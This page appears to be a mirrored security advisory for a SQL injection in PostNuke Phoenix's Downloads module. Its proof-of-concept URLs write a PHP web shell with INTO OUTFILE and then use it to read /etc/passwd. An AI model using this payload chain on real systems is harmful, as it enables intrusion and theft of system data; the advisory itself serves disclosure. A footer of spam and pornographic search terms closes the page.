exploits , vulnerabilities , articles , PostNuke Phoenix SHOW Parameter Remote SQL Injection Vulnerability

Title	PostNuke Phoenix SHOW Parameter Remote SQL Injection Vulnerability
Published	2005-02-28-12:00AM
Updated	2005-02-28-10:39PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery is credited to Maksymilian Arciemowicz <max@jestsuper.pl>.
Vulnerable	PostNuke Development Team PostNuke Phoenix 0.760 RC2 PostNuke Development Team PostNuke Phoenix 0.750 PostNuke Development Team PostNuke Phoenix 0.726 PostNuke Development Team PostNuke Phoenix 0.723 PostNuke Development Team PostNuke Phoenix 0.722 PostNuke Development Team PostNuke Phoenix 0.721
Not Vulnerable	PostNuke Development Team PostNuke Phoenix 0.760 RC3
Code	An exploit is not required. The following proof of concept examples are available: http://www.example.com/index.php?name=Downloads&req=search&query=&show=cXIb8O3 http://www.example.com/index.php?name=Downloads&req=search&query=[Program name]&show=10%20INTO%20OUTFILE%20'/[PATH]/pnTemp/Xanthia_cache/cXIb8O3.php'/* http://www.example.com/pnTemp/Xanthia_cache/cXIb8O3.php?cx=cat /etc/passwd
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-16 ZABBIX Denial Of Service and SQL Injection Vulnerabilities
2009-12-16 IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability
2009-12-16 Horde Application Framework Administration Interface Cross-Site Scripting Vulnerability
2009-12-16 Mozilla Firefox and SeaMonkey MFSA 2009-65 through -71 Multiple Vulnerabilities
2009-12-16 Merkaartor Insecure Temporary File Creation Vulnerability
2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability
2009-12-15 PostgreSQL Index Function Session State Modification Local Privilege Escalation Vulnerability
2009-12-15 PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
2009-12-15 IBM DB2 prior to 9.5 Fix Pack 5 Multiple Unspecified Security Vulnerabilities
2009-12-15 Sun Ray Server Software Desktop Session Handling Local Security Bypass Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 01:02:48 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
wwwpichunt Download f www.5sheng www.p0551. www.xxx@ya www.freese xingyuan.z www.freese Anal sexe Photo sex 200 /compo WWW.INDEYN maxcpm.inf free sexy www.b533.c www.pcb88. DAV Scann maxcpm.inf Tamil acde xxx fuck OScommerc pw dump 2 &ccedi videosreci bigmasal black lesb sexiwomens 10.714.zhu sexygypsyp all cartoo feexxxmove cheap doll seaxygirls dogsexbygi 3.0.10 anhladodic www.trish maxcpm.inf invision p Gerlsex www.xztop. anhladodic BBtoNuke www.jfqxj. nukebb maxcpm.inf fingered nokia mobi www.vanama wwwallindi